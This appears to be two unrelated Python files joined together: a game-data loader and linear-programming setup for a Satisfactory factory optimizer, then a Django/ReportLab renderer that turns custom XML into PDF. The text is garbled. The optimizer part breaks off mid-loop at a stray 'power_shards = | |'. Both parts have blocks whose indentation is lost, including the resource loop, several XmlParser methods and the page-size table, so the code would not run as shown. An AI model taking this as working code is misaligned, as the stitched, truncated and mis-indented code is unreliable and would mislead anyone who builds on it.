with open(docs_path, "r", encoding="utf-16") as f:
    docs_raw = json.load(f)
# class_entries: class name -> raw entry; class_types: native type -> entries.
class_entries = {}
class_types = {}
for fg_entry in docs_raw:
    # Strip the "Class'/Script/FactoryGame.X'" wrapper down to just X.
    class_type = re.sub(r"Class'/Script/FactoryGame.(\w+)'", r"\1", fg_entry["NativeClass"])
    class_type_list = []
    for class_entry in fg_entry["Classes"]:
        class_name = class_entry["ClassName"]
        # First occurrence wins; duplicates are reported and dropped.
        if class_name in class_entries:
            print(f"WARNING: ignoring duplicate class {class_name}")
        else:
            class_entries[class_name] = class_entry
            class_type_list.append(class_entry)
    class_types[class_type] = class_type_list
### Parsing helpers ###
def parse_paren_list(s):
    """Split a "(a,b,c)" string into ["a","b","c"]; ""/None -> None, "()" -> []."""
    if not s:
        return None
    assert(s.startswith("(") and s.endswith(")"))
    inner = s[1:-1]
    return inner.split(",") if inner else []
def find_class_name(s):
    """Extract the first ".ClassName" token from an asset-path string."""
    match = re.search(r"\.\w+", s)
    if match is None:
        raise ValueError(f"could not find class name in: {s}")
    # Drop the leading dot.
    return match.group(0)[1:]
def parse_class_list(s):
    """Parse a paren-list of asset references into bare class names."""
    entries = parse_paren_list(s)
    if entries is None:
        return None
    return [find_class_name(entry) for entry in entries]
def find_item_amounts(s):
    """Yield (class_name, amount) for every ItemClass/Amount pair in *s*."""
    pattern = r"\(ItemClass=([^,]+),Amount=(\d+)\)"
    for match in re.finditer(pattern, s):
        yield (find_class_name(match.group(1)), int(match.group(2)))
### Misc constants ###
# NOTE(review): the 0.5 and 60000.0 scale factors presumably convert the
# Docs.json units to items/min resp. fluid-units/min — confirm against data.
CONVEYOR_BELT_LIMIT = 0.5 * float(class_entries[CONVEYOR_BELT_CLASS]["mSpeed"])
PIPELINE_LIMIT = 60000.0 * float(class_entries[PIPELINE_CLASS]["mFlowLimit"])
SINK_POWER_CONSUMPTION = float(class_entries[SINK_CLASS]["mPowerConsumption"])
print(f"CONVEYOR_BELT_LIMIT: {CONVEYOR_BELT_LIMIT}")
print(f"PIPELINE_LIMIT: {PIPELINE_LIMIT}")
print(f"SINK_POWER_CONSUMPTION: {SINK_POWER_CONSUMPTION}")
### Miners ###
def parse_miner(entry):
    """Convert an extractor building entry into the optimizer's miner record."""
    # The resource-well pressurizer carries no extraction data itself;
    # cycle/allow-list fields come from the fracking extractor entry.
    if entry["ClassName"] == RESOURCE_WELL_PRESSURIZER_CLASS:
        extractor = class_entries[RESOURCE_WELL_EXTRACTOR_CLASS]
    else:
        extractor = entry
    return {
        "class": entry["ClassName"],
        "display_name": entry["mDisplayName"],
        "power_consumption": float(entry["mPowerConsumption"]),
        "power_consumption_exponent": float(entry["mPowerConsumptionExponent"]),
        "min_clock": float(entry["mMinPotential"]),
        "max_clock_base": float(entry["mMaxPotential"]),
        "max_clock_per_power_shard": float(entry["mMaxPotentialIncreasePerCrystal"]),
        # Items per minute at 100% clock.
        "rate": 60.0 / float(extractor["mExtractCycleTime"]) * float(extractor["mItemsPerCycle"]),
        "only_allow_certain_resources": (extractor["mOnlyAllowCertainResources"] == "True"),
        "allowed_resource_forms": parse_paren_list(extractor["mAllowedResourceForms"]),
        "allowed_resources": parse_class_list(extractor["mAllowedResources"]),
    }
# Extractor buildings considered by the optimizer, keyed by class name.
miners = {}
for name in (MINER_CLASS, OIL_EXTRACTOR_CLASS, WATER_EXTRACTOR_CLASS, RESOURCE_WELL_PRESSURIZER_CLASS):
    miners[name] = parse_miner(class_entries[name])
# pprint(miners)
### Manufacturers ###
def parse_manufacturer(entry):
    """Extract the power/clock model of a manufacturer building entry."""
    def num(key):
        # All numeric fields arrive as strings in Docs.json.
        return float(entry[key])
    return {
        "class": entry["ClassName"],
        "display_name": entry["mDisplayName"],
        "power_consumption": num("mPowerConsumption"),
        "power_consumption_exponent": num("mPowerConsumptionExponent"),
        "min_clock": num("mMinPotential"),
        "max_clock_base": num("mMaxPotential"),
        "max_clock_per_power_shard": num("mMaxPotentialIncreasePerCrystal"),
    }
# All manufacturer buildings keyed by class name, tagged with whether their
# power draw is recipe-dependent (variable) or fixed.
manufacturers = {}
for entry in class_types["FGBuildableManufacturer"]:
    manufacturer = parse_manufacturer(entry)
    manufacturer["is_variable_power"] = False
    manufacturers[entry["ClassName"]] = manufacturer
for entry in class_types["FGBuildableManufacturerVariablePower"]:
    manufacturer = parse_manufacturer(entry)
    manufacturer["is_variable_power"] = True
    manufacturers[entry["ClassName"]] = manufacturer
# pprint(manufacturers)
### Recipes ###
def parse_recipe(entry):
    """Convert an FGRecipe entry into the optimizer's recipe record.

    Returns None for recipes that cannot run in any known manufacturer
    (i.e. manual-only recipes), which the caller drops.
    """
    # Pick the first producer that is a known manufacturer building.
    recipe_manufacturer = None
    for manufacturer in parse_class_list(entry["mProducedIn"]) or []:
        if manufacturer in manufacturers:
            recipe_manufacturer = manufacturer
            break
    # we are only considering automatable recipes
    if recipe_manufacturer is None:
        return None
    # Crafting cycles per minute at 100% clock.
    rate = 60.0 / float(entry["mManufactoringDuration"])
    def item_rates(key):
        return [(item, rate * amount) for (item, amount) in find_item_amounts(entry[key])]
    vpc_constant = float(entry["mVariablePowerConsumptionConstant"])
    vpc_factor = float(entry["mVariablePowerConsumptionFactor"])
    return {
        "class": entry["ClassName"],
        "display_name": entry["mDisplayName"],
        "manufacturer": recipe_manufacturer,
        "inputs": item_rates("mIngredients"),
        "outputs": item_rates("mProduct"),
        # constant + factor/2: presumably the mean of the variable power
        # range — TODO confirm against the game's power model.
        "variable_power_consumption": vpc_constant + 0.5 * vpc_factor,
    }
recipes = {}
# Keep only recipes that can run in at least one automatable manufacturer.
for entry in class_types["FGRecipe"]:
    parsed = parse_recipe(entry)
    if parsed is None:
        continue
    recipes[entry["ClassName"]] = parsed
# pprint(recipes)
### Items ###
def parse_item(entry):
    """Parse one item descriptor entry into the fields the planner uses.

    Returns display name, physical form, AWESOME-sink point value, stack
    size, and energy content (value when burned as fuel).
    """
    # Fix: the original computed `points` into an unused local and then
    # re-read the raw entry for the dict value; compute it once and use it.
    points = int(entry["mResourceSinkPoints"])
    return {
        "display_name": entry["mDisplayName"],
        "form": entry["mForm"],
        "points": points,
        "stack_size": STACK_SIZES[entry["mStackSize"]],
        "energy": float(entry["mEnergyValue"]),
    }
items = {}
# any items not contained in Docs.json
items.update(ADDITIONAL_ITEMS)
# All descriptor class types whose entries represent obtainable items.
for class_type in [
    "FGItemDescriptor",
    "FGItemDescriptorBiomass",
    "FGItemDescriptorNuclearFuel",
    "FGResourceDescriptor",
    "FGEquipmentDescriptor",
    "FGConsumableDescriptor",
]:
    for entry in class_types[class_type]:
        item = parse_item(entry)
        # Nuclear fuels additionally track which waste item (and how much)
        # is produced per fuel unit consumed.
        if class_type == "FGItemDescriptorNuclearFuel":
            item["nuclear_waste"] = NUCLEAR_WASTE_MAPPINGS[entry["ClassName"]]
            item["nuclear_waste_amount"] = float(entry["mAmountOfWaste"])
        items[entry["ClassName"]] = item
# pprint(items)
### Generators ###
generators = {}
def parse_generator(entry):
    """Parse a fuel-burning generator entry (coal / fuel / nuclear)."""
    return {
        "display_name": entry["mDisplayName"],
        "fuel_classes": parse_class_list(entry["mDefaultFuelClasses"]),
        "power_production": float(entry["mPowerProduction"]),
        "power_production_exponent": float(entry["mPowerProductionExponent"]),
        "requires_supplemental": entry["mRequiresSupplementalResource"] == "True",
        "supplemental_to_power_ratio": float(entry["mSupplementalToPowerRatio"]),
    }
def parse_geothermal_generator(entry):
    """Parse the geothermal generator (variable power output).

    mVariablePowerProductionConstant is 0 in Docs.json even though the game
    header sets it to 100.0f, so the 100.0 base is hardcoded here; the mean
    output is that base plus half the variable factor.
    """
    mean_variable = 0.5 * float(entry["mVariablePowerProductionFactor"])
    return {
        "display_name": entry["mDisplayName"],
        "power_production": 100.0 + mean_variable,
    }
# coal and fuel generators
for entry in class_types["FGBuildableGeneratorFuel"]:
    # exclude biomass generator
    if entry["ClassName"] == BIOMASS_GENERATOR_CLASS:
        continue
    generators[entry["ClassName"]] = parse_generator(entry)
# nuclear power plant
for entry in class_types["FGBuildableGeneratorNuclear"]:
    generators[entry["ClassName"]] = parse_generator(entry)
# geothermal generator (special case)
# Kept out of `generators`: it burns no fuel, so it is stored separately.
geothermal_generator = parse_geothermal_generator(class_entries[GEOTHERMAL_GENERATOR_CLASS])
# pprint(generators)
### Resources ###
# Node/slug locations come from a separate map-info JSON file.
with open(map_info_path, "r") as f:
    map_info_raw = json.load(f)
map_info = {}
# Flatten the tab list into {tabId: options}.
for tab in map_info_raw["options"]:
    if "tabId" in tab:
        map_info[tab["tabId"]] = tab["options"]
TOTAL_POWER_SHARDS = 0
# Total obtainable shards: slugs per rarity tier times shards per slug.
for slug_type in map_info["power_slugs"][0]["options"]:
    TOTAL_POWER_SHARDS += POWER_SLUG_SHARDS[slug_type["layerId"]] * len(slug_type["markers"])
print(f"TOTAL_POWER_SHARDS: {TOTAL_POWER_SHARDS}")
resources = {}  # resource_id -> minable node group
geysers = {}    # geyser node groups, kept separate from resources
def parse_and_add_node_type(node_type):
    # Parse one map-info node type and accumulate its nodes into
    # resources/geysers, grouped by (item, subtype).
    if "type" not in node_type:
        return
    item = node_type["type"]
    # Translate map-info type slugs to item classes; None means "ignore".
    if item in RESOURCE_MAPPINGS:
        item = RESOURCE_MAPPINGS[item]
    if item is None:
        return
    output = geysers if item == GEYSER_CLASS else resources
    for node_purity in node_type["options"]:
        purity = node_purity["purity"]
        nodes = node_purity["markers"]
        if not nodes:
            continue
        sample_node = nodes[0]
        if "core" in sample_node:
            # resource well satellite nodes, map them to cores
            for node in nodes:
                subtype = find_class_name(node["core"])
                resource_id = f"{item}|{subtype}"
                if resource_id not in output:
                    output[resource_id] = {
                        "resource_id": resource_id,
                        "item": item,
                        "subtype": subtype,
                        "multiplier": 0.0,  # summed over satellites below
                        "count": 1,  # one pressurizer per core
                        "is_limited": True,
                        "is_resource_well": True,
                        "num_satellites": 0,
                    }
                # Each satellite contributes its purity multiplier to the core.
                output[resource_id]["multiplier"] += PURITY_MULTIPLIERS[purity]
                output[resource_id]["num_satellites"] += 1
        else:
            # normal nodes, add directly
            subtype = purity
            resource_id = f"{item}|{subtype}"
            assert(resource_id not in output)
            output[resource_id] = {
                "resource_id": resource_id,
                "item": item,
                "subtype": subtype,
                "multiplier": PURITY_MULTIPLIERS[purity],
                "count": len(nodes),
                "is_limited": True,
                "is_resource_well": False,
            }
# Resource nodes and resource wells share the same node-type schema.
for node_type in (*map_info["resource_nodes"], *map_info["resource_wells"]):
    parse_and_add_node_type(node_type)
# Water is unlimited: model the water extractor as a pseudo-resource with
# no node count and no cap.
resources[WATER_CLASS] = {
    # NOTE(review): unlike node resources, the dict key (WATER_CLASS) differs
    # from this "resource_id", and the separator is ":" rather than "|" —
    # looks intentional for display purposes, but verify against consumers.
    "resource_id": f"{WATER_CLASS}:extractor",
    "item": WATER_CLASS,
    "subtype": "extractor",
    "multiplier": 1,
    "is_limited": False,
    "is_resource_well": False,
}
# pprint(resources)
# pprint(geysers)
### LP setup ###
class LPColumn(dict):
    """A dict of LP coefficients ({row_id: value}) plus display metadata.

    Behaves exactly like a dict; display_info carries presentation-only
    details and never affects the solve.
    """
    def __init__(self, *args, display_info=None, **kwargs):
        super().__init__(*args, **kwargs)
        self.display_info = display_info
# column_id -> LPColumn of {row_id: coefficient}
lp_columns = {}
# row_id -> required value (equality constraints)
lp_equalities = {}
# row_id -> lower bound (inequality constraints)
lp_lower_bounds = {}
def get_power_consumption(machine, clock=1.0, recipe=None):
    """Return the machine's power draw at the given clock multiplier.

    Variable-power machines add the recipe's variable draw to the base
    before applying the overclock power exponent.
    """
    base = machine["power_consumption"]
    if recipe is not None and machine.get("is_variable_power", False):
        base += recipe["variable_power_consumption"]
    exponent = machine["power_consumption_exponent"]
    return base * clock ** exponent
def get_miner_for_resource(resource):
    """Pick the unique extractor building able to mine *resource*."""
    item_class = resource["item"]
    form = items[item_class]["form"]
    wants_pressurizer = resource["is_resource_well"]
    candidates = [
        miner_class
        for miner_class, miner in miners.items()
        if wants_pressurizer == (miner_class == RESOURCE_WELL_PRESSURIZER_CLASS)
        and form in miner["allowed_resource_forms"]
        and (not miner["only_allow_certain_resources"]
             or item_class in miner["allowed_resources"])
    ]
    if not candidates:
        raise RuntimeError(f"could not find miner for resource {item_class}")
    if len(candidates) > 1:
        raise RuntimeError(f"more than one miner for resource {item_class}: {candidates}")
    return candidates[0]
def get_form_conveyance_limit(form):
    """Return the max transport rate for a resource form.

    Solids move on conveyor belts; liquids and gases move in pipelines.

    Raises ValueError for an unrecognized form. (Previously this was
    `assert(False)`, which is silently stripped under `python -O`.)
    """
    if form == "RF_SOLID":
        return CONVEYOR_BELT_LIMIT
    if form in ("RF_LIQUID", "RF_GAS"):
        return PIPELINE_LIMIT
    raise ValueError(f"unknown resource form: {form}")
def get_max_overclock(machine):
    """Highest clock reachable with the maximum number of power shards."""
    shard_gain = MACHINE_POWER_SHARD_LIMIT * machine["max_clock_per_power_shard"]
    return machine["max_clock_base"] + shard_gain
def get_conveyance_limit_clock(item, rate):
    """Largest clock keeping `rate` within the item's transport limit.

    Truncated (not rounded) to six decimals so the effective rate never
    exceeds the belt/pipe limit.
    """
    limit = get_form_conveyance_limit(item["form"])
    return math.floor(1000000 * limit / rate) / 1000000
def get_max_miner_clock(miner, resource, rate):
    """Max miner clock, capped by belt/pipe throughput when applicable."""
    max_overclock = get_max_overclock(miner)
    # Resource wells output through their satellites, so the pressurizer
    # itself is not conveyance-limited.
    if resource["is_resource_well"]:
        return max_overclock
    item = items[resource["item"]]
    return min(max_overclock, get_conveyance_limit_clock(item, rate))
def get_max_manufacturer_clock(manufacturer, recipe):
    """Max clock for a recipe, capped by each input/output conveyance limit."""
    io_rates = recipe["inputs"] + recipe["outputs"]
    return min(
        get_max_overclock(manufacturer),
        *(get_conveyance_limit_clock(items[item_class], rate)
          for (item_class, rate) in io_rates),
    )
def get_power_shards_needed(machine, clock):
    """Number of power shards required to reach *clock* (0 if none)."""
    overclock = clock - machine["max_clock_base"]
    shards = math.ceil(overclock / machine["max_clock_per_power_shard"])
    return max(0, shards)
def get_item_display_name(item_class):
    """Human-readable item name, falling back to the extra display table."""
    item = items.get(item_class)
    if item is not None:
        return item["display_name"]
    return ADDITIONAL_DISPLAY_NAMES[item_class]
def add_lp_column(column, type_, name, display_name=None, machine_name=None, subtype=None, clock=None):
    """Register an LP column under a unique "type|name[|subtype][|clock%]" id."""
    tokens = [type_, name]
    if subtype is not None:
        tokens.append(subtype)
    if clock is not None:
        tokens.append(f"{100.0 * clock}")
    lp_columns["|".join(tokens)] = LPColumn(
        column,
        display_info={
            "type": type_,
            "display_name": display_name or name,
            "machine_name": machine_name,
            "subtype": subtype,
            "clock": clock,
        },
    )
for resource_id, resource in resources.items():
item_class = resource["item"]
item = items[item_class]
miner_class = get_miner_for_resource(resource)
miner = miners[miner_class]
rate = miner["rate"] * resource["multiplier"]
min_clock = miner["min_clock"]
max_clock_base = miner["max_clock_base"]
max_clock = get_max_miner_clock(miner, resource, rate)
resource_var = f"resource|{resource_id}"
item_var = f"item|{item_class}"
clock_choices = {max_clock_base, max_clock}
for clock in args.extra_miner_clocks:
clock = min(max_clock, max(min_clock, clock))
clock_choices.add(clock)
for clock in sorted(clock_choices):
column = {
item_var: clock * rate,
"power_consumption": get_power_consumption(miner, clock=clock),
"machines": 1 + (resource["num_satellites"] if resource["is_resource_well"] else 0),
}
if resource["is_limited"]:
column[resource_var] = -1
power_shards = | |
import logging
from io import BytesIO
from reportlab.lib import pagesizes, colors
from reportlab.lib.units import mm, toLength
from reportlab.lib.enums import TA_RIGHT, TA_CENTER, TA_LEFT, TA_JUSTIFY
from reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle
from reportlab.pdfbase import pdfmetrics
from reportlab.pdfbase.pdfform import resetPdfForm
from reportlab.pdfbase.ttfonts import TTFont
from reportlab.pdfgen.canvas import Canvas
from reportlab.platypus import Paragraph, Table, Spacer, Image, PageBreak
from reportlab.platypus.doctemplate import SimpleDocTemplate
from svglib.svglib import SvgRenderer
from pdfgen.flowables import TextField, BackgroundImage, PageMarker
import xml.dom.minidom
from django.conf import settings
from pdfgen.barcode import Barcode
from .compat import find, etree
logger = logging.getLogger(__name__)
# Maps CSS-like attribute names from the input XML to their ReportLab
# TableStyle/ParagraphStyle equivalents. NOTE(review): attribute names and
# alignment keyword *values* share one flat namespace here — lookups
# translate both (see style()/tstyle()).
CSS_DICT = {
    'padding-left': 'LEFTPADDING',
    'padding-right': 'RIGHTPADDING',
    'padding-top': 'TOPPADDING',
    'padding-bottom': 'BOTTOMPADDING',
    'border-left': 'LINEBEFORE',
    'border-right': 'LINEAFTER',
    'border-top': 'LINEABOVE',
    'border-bottom': 'LINEBELOW',
    'text-align': 'alignment',
    'font-family': 'fontName',
    'font-size': 'fontSize',
    'color': 'textColor',
    'left': TA_LEFT,
    'right': TA_RIGHT,
    'center': TA_CENTER,
    'justify': TA_JUSTIFY,
}
def _new_draw(self):
    # Replacement for Paragraph.draw (installed by patch_reportlab): forces
    # a thin 0.2mm line width before drawing the paragraph.
    self.canv.setLineWidth(0.2*mm)
    self.drawPara(self.debug)
def patch_reportlab():
    # Monkey-patch Paragraph.draw process-wide with _new_draw above.
    setattr(Paragraph, 'draw', _new_draw)
# Applied at import time: every Paragraph rendered after this module loads
# uses the patched draw.
patch_reportlab()
def debug_print(text):
    """Log *text* at DEBUG level, but only when Django DEBUG is enabled."""
    if not settings.DEBUG:
        return
    logger.debug(text)
def split_ignore(haystack, needle, ignore_start=None, ignore_end=None):
    """Split *haystack* on *needle*, ignoring needles inside marked spans.

    Text between ignore_start and ignore_end (CDATA markers by default) is
    never split on; the markers themselves are stripped from the returned
    parts. Always returns at least one part (the trailing remainder).
    """
    parts = []
    ignore_start = ignore_start or '<![CDATA['
    ignore_end = ignore_end or ']]>'
    haystack_len, needle_len, ignore_start_len, ignore_end_len = \
        len(haystack), len(needle), len(ignore_start), len(ignore_end)
    ignore = False  # currently inside an ignore span?
    i = 0  # scan position
    pi = -1  # index of the last character of the previous needle match
    while i < haystack_len:
        unignored = False
        # Close an ignore span when its end marker starts here.
        if ignore and i+ignore_end_len <= haystack_len and haystack[i:i+ignore_end_len] == ignore_end:
            ignore = False
            unignored = True
        # Outside ignore spans, a needle match emits the accumulated part
        # (with any markers stripped) and skips past the needle.
        if not ignore and i+needle_len <= haystack_len and haystack[i:i+needle_len] == needle:
            part = haystack[pi+1:i].replace(ignore_start, '').replace(ignore_end, '')
            i += needle_len-1
            pi = i
            parts.append(part)
        # Open an ignore span — unless one was just closed at this position.
        if not ignore and not unignored and i+ignore_start_len <= haystack_len and \
                haystack[i:i+ignore_start_len] == ignore_start:
            ignore = True
        i += 1
    # Trailing remainder after the last needle.
    parts.append(haystack[pi+1:].replace(ignore_start, '').replace(ignore_end, ''))
    return parts
def inner_xml(e):
    # Serialized content between e's start and end tags, obtained by slicing
    # "<tag>" (len+2) and "</tag>" (len+3) off the full serialization.
    # NOTE(review): breaks if the start tag carries attributes, and assumes
    # etree.tostring returns str — verify against the compat etree in use.
    return etree.tostring(e).strip()[len(e.tag)+2:-len(e.tag)-3]
def content(e):
    """Return e's leading text followed by its serialized child elements.

    `e.text` is None when the element starts directly with a child element,
    so substitute '' to avoid a TypeError during concatenation.
    """
    return (e.text or '') + ''.join(etree.tostring(c) for c in e)
class XmlParser(object):
    """Renders a custom XML document description into a PDF via ReportLab.

    Each element tag dispatches to the generator method of the same name
    (see parse_element); unknown tags fall through to parse_children.
    """
    document = None  # SimpleDocTemplate, created lazily by doc()
    styles = None  # ReportLab stylesheet, fresh per instance
    out_buffer = None  # BytesIO receiving the rendered PDF
    style_stack = None  # active <div> styles, innermost last
    barcode_library = ''  # library path passed through to Barcode flowables
    # NOTE(review): class-level dict shared across ALL parser instances;
    # font registration is process-wide anyway, so this acts as a cache.
    fonts = {}
    #: the Django MEDIA_URL
    media_url = ''
    #: the Django STATIC_URL
    static_url = ''
    background = None  # BackgroundImage drawn behind every page
    footer_flowable = None  # flowable drawn in the bottom margin
    footer_on_first_page = False  # set by <footer firstpage="true">
    def __init__(self):
        # Fresh stylesheet/buffer/stack per parser; URL prefixes come from
        # Django settings so src attributes may use STATIC_URL/MEDIA_URL paths.
        self.styles = getSampleStyleSheet()
        self.out_buffer = BytesIO()
        self.style_stack = []
        self.media_url = getattr(settings, 'MEDIA_URL', '')
        self.static_url = getattr(settings, 'STATIC_URL', '')
def get_from_url(self, url):
"""
For a given URL, return the matching path to the directory.
Support MEDIA_URL and STATIC_URL
"""
if self.static_url and url.startswith(self.static_url):
url = url.replace(self.static_url, '', 1)
elif self.media_url and url.startswith(self.media_url):
url = url.replace(self.media_url, '', 1)
return find(url)
    def set_background_image(self, canvas, doc):
        # Page-draw callback: paint the captured background (if any) under
        # the page content.
        canvas.saveState()
        if self.background:
            self.background.draw(canvas, doc)
        # Header
        # header = Paragraph('This is a multi-line header. It goes on every page. ' * 5, self.styles['Normal'])
        # w, h = header.wrap(doc.width, doc.topMargin)
        # header.drawOn(canvas, doc.leftMargin, doc.height + doc.topMargin - h)
        canvas.restoreState()
    def handle_first_page(self, canvas, doc):
        # onFirstPage callback: background always, footer only if requested.
        self.set_background_image(canvas, doc)
        if self.footer_on_first_page:
            self.draw_footer(canvas, doc)
    def handle_later_pages(self, canvas, doc):
        # onLaterPages callback: background and footer on every later page.
        self.set_background_image(canvas, doc)
        self.draw_footer(canvas, doc)
def draw_footer(self, canvas, doc):
print('-' * 80)
print('Trying to draw footer...', repr(self.footer_flowable))
if self.footer_flowable is None:
return
canvas.saveState()
w, h = self.footer_flowable.wrap(doc.width, doc.bottomMargin)
self.footer_flowable.drawOn(canvas, doc.leftMargin, doc.bottomMargin - h)
canvas.restoreState()
def merge_parts(self, parts):
if self.document is not None:
self.document.build(
parts,
onFirstPage=self.handle_first_page,
onLaterPages=self.handle_later_pages
)
output_data = self.out_buffer.getvalue()
self.out_buffer.close()
return output_data
else:
return None
    def parse(self, buffer):
        # Parse an XML document buffer and return the rendered PDF bytes.
        resetPdfForm()  # work around for stupid global state in reportlab
        parts = self.parse_parts(buffer)
        return self.merge_parts(parts)
    def parse_parts(self, buffer):
        # Parse the XML into the flat list of flowables for the doc build.
        xdoc = etree.fromstring(buffer)
        return list(self.parse_element(xdoc))
    def parse_element(self, e):
        # Dispatch an element to the handler method named after its tag;
        # unknown tags recurse into their children. BackgroundImage flowables
        # are captured for the page callbacks instead of being yielded.
        try:
            method = getattr(self, e.tag, self.parse_children)
            for i in method(e):
                if isinstance(i, BackgroundImage):
                    # save the background image, don't add it to render list
                    self.background = i
                    continue
                else:
                    yield i
        except TypeError:
            # some elements are not strings, like Comment
            # NOTE(review): this broad catch also swallows TypeErrors raised
            # inside handler methods — consider narrowing to the tag lookup.
            pass
    def parse_children(self, e):
        # Flatten the flowables produced by all child elements, in order.
        for c in e:
            for i in self.parse_element(c):
                yield i
PAGE_SIZES_MAPPING = {
'A0': pagesizes.A0,
'A1': pagesizes.A1,
'A2': pagesizes.A2,
'A3': pagesizes.A3,
'A4': pagesizes.A4,
'A5': pagesizes.A5,
'A6': pagesizes.A6,
'B0': pagesizes.B0,
'B1': pagesizes.B1,
'B2': pagesizes.B2,
'B3': pagesizes.B3,
'B4': pagesizes.B4,
'B5': pagesizes.B5,
'B6': pagesizes.B6,
'LETTER': pagesizes.LETTER,
'LEGAL': pagesizes.LEGAL,
'ELEVENSEVENTEEN': pagesizes.ELEVENSEVENTEEN,
}
    def doc(self, e):
        # <doc format="A4|W,H" margin="t,r,b,l" title="...">: root element.
        # Creates the document template (the first <doc> wins) and yields
        # the flowables produced by its children.
        fmt = e.get('format', 'A4')
        raw_margins = e.get('margin', '2cm, 2cm, 2cm, 2cm')
        title = e.get('title')
        # "width,height" as explicit lengths, otherwise a named page size.
        if ',' in fmt:
            w, h = (toLength(i.strip()) for i in fmt.split(','))
            fmt = (w, h)
        else:
            fmt = self.PAGE_SIZES_MAPPING.get(fmt.upper(), pagesizes.A4)
        # Margin order follows CSS: top, right, bottom, left.
        top_margin, right_margin, bottom_margin, left_margin = (toLength(i.strip()) for i in raw_margins.split(','))
        def make_canvas(*args, **kwargs):
            # Custom canvas factory, only to default a hairline line width.
            canvas = Canvas(*args, **kwargs)
            canvas.setLineWidth(0.25)
            return canvas
        if self.document is None:
            self.document = SimpleDocTemplate(self.out_buffer,
                                              pagesize=fmt,
                                              title=title,
                                              topMargin=top_margin,
                                              leftMargin=left_margin,
                                              rightMargin=right_margin,
                                              bottomMargin=bottom_margin,
                                              canvasmaker=make_canvas)
        for i in self.parse_children(e):
            yield i
    def style(self, e):
        # <style name="..." [base="..."] css-attrs...>: define or update a
        # named ParagraphStyle from CSS-like attributes.
        name = e.get('name')
        source_name = e.get('base', None)
        def_dict = dict(e.attrib)
        del def_dict['name']
        if 'base' in def_dict:
            del def_dict['base']
        new_dict = {}
        for k in def_dict.keys():
            v = def_dict[k]
            # Translate the attribute name, then the value (alignment
            # keywords live in the same CSS_DICT namespace).
            nk = CSS_DICT.get(k, k)
            # translate v
            v = CSS_DICT.get(v, v)
            if nk == 'fontSize' or nk == 'leading':
                v = toLength(v)
            elif nk == 'color':
                # "#rrggbb" -> ReportLab color
                v = colors.HexColor(int('0x' + v[1:], 0))
            new_dict[nk] = v
        # Default the leading to 1.5x the font size when not given.
        if 'leading' not in new_dict and 'fontSize' in new_dict:
            new_dict['leading'] = new_dict['fontSize'] * 1.5  # + 2.0
        # Inherit everything from the base style, then overlay our values.
        if source_name is not None:
            source_dict = self.styles[source_name].__dict__.copy()
            source_dict.update(new_dict)
            new_dict = source_dict
        new_dict.update({'name': name})
        # Redefining an existing style mutates it in place.
        if name in self.styles:
            self.styles[name].__dict__.update(new_dict)
        else:
            self.styles.add(ParagraphStyle(**new_dict))
        # make this function an empty generator
        if False:
            yield  # noqa
def font(self, e):
name = e.get('name')
path = e.get('src')
self.import_pdf_font(path, name)
if False:
yield # noqa
def div(self, e):
style = e.get('style', None)
if style is not None:
self.style_stack.append(self.styles[style])
parts = list(self.parse_children(e))
if style is not None:
self.style_stack.pop()
for i in parts:
yield i
def p(self, e):
data = inner_xml(e)
para = Paragraph(data, self.style_stack[-1] if len(self.style_stack) > 0 else self.styles['Normal'])
yield para
def textfield(self, e): # noqa
name = e.get('name')
value = e.get('value')
width = int(e.get('width', "100"))
height = int(e.get('height', "20"))
yield TextField(name, width, height, value)
    def tstyle(self, e):  # noqa
        # <tstyle area="r1[,c1]:r2[,c2]" attrs...>: yields one TableStyle
        # command per attribute, as [DESC, cell_from, cell_to, *params].
        area = e.get('area', '0:-1')
        # Each corner may be "n" or "n,m"; with a bare "n" the same value is
        # used for both row and column ([0] and [-1] are then identical).
        # NOTE(review): ReportLab cell coords are (col, row) — confirm the
        # intended meaning of the first/second numbers in "area".
        top_left, bottom_right = (list(int(q) for q in p.split(',')) for p in area.split(':'))
        top = top_left[0]
        left = top_left[-1]
        bottom = bottom_right[0]
        right = bottom_right[-1]
        cells = [(top, left), (bottom, right)]
        tstyle_dict = dict(e.attrib)
        if 'area' in tstyle_dict:
            del tstyle_dict['area']
        # Shorthand: "border"/"padding" expand to all four sides.
        if 'border' in tstyle_dict:
            border = tstyle_dict['border']
            tstyle_dict.update({'border-left': border,
                                'border-right': border,
                                'border-top': border,
                                'border-bottom': border
                                })
            del tstyle_dict['border']
        if 'padding' in tstyle_dict:
            padding = tstyle_dict['padding']
            tstyle_dict.update({'padding-left': padding,
                                'padding-right': padding,
                                'padding-top': padding,
                                'padding-bottom': padding
                                })
            del tstyle_dict['padding']
        for key in tstyle_dict.keys():
            value = tstyle_dict[key]
            desc = CSS_DICT.get(key, key.upper())
            # Each comma-separated param may be a #rrggbb color, a length,
            # or a bare keyword (uppercased for ReportLab).
            params = value.split(',')
            for i in range(len(params)):
                param = params[i].strip()
                if param[0] == '#':
                    params[i] = colors.HexColor(int('0x' + param[1:], 0))
                else:
                    try:
                        floatval = toLength(param)
                        params[i] = floatval
                    except ValueError:
                        params[i] = param.upper()
            yield [desc] + cells + params
def tr(self, e):
for c in e:
if c.tag == 'td':
yield list(self.parse_children(c)) if len(c) else None
def table(self, e):
cols = [toLength(i.strip()) for i in e.get('cols').split(',')]
align = e.get('align', 'left').upper()
repeatrows = int(e.get('repeatrows', '0'))
tstyles = []
rows = []
for c in e:
if c.tag == 'tstyle':
tstyles += list(self.tstyle(c))
else:
rows.append(list(self.parse_element(c)))
table_obj = Table(rows, cols, hAlign=align, style=tstyles, repeatRows=repeatrows)
yield table_obj
    def pagebreak(self, e):  # noqa
        # <pagebreak/>: force a new page.
        yield PageBreak()
    def pagemarker(self, e):  # noqa
        # <pagemarker name="...">text</pagemarker>: non-rendering marker
        # flowable carrying a name and its text content.
        yield PageMarker(name=e.get('name'), description=content(e))
def footer(self, e):
self.footer_flowable = list(self.parse_children(e))[0]
self.footer_on_first_page = e.get('firstpage', 'false').lower() in ('true', '1')
if False:
yield # noqa
def spacer(self, e): # noqa
width = toLength(e.get('width', '1pt'))
height = toLength(e.get('height'))
yield Spacer(width, height)
def vector(self, e):
scale = float(e.get('scale', '1.0'))
width = toLength(e.get('width'))
height = toLength(e.get('height'))
path = e.get('src')
search = e.get('search', None)
replace = e.get('replace', None)
fh = open(self.get_from_url(path), 'rb')
data = fh.read()
fh.close()
if search is not None:
data = data.replace(search, replace)
svg = xml.dom.minidom.parseString(data).documentElement
svg_renderer = SvgRenderer('')
svg_obj = svg_renderer.render(svg)
svg_obj.scale(scale, scale)
svg_obj.asDrawing(width, height)
yield svg_obj
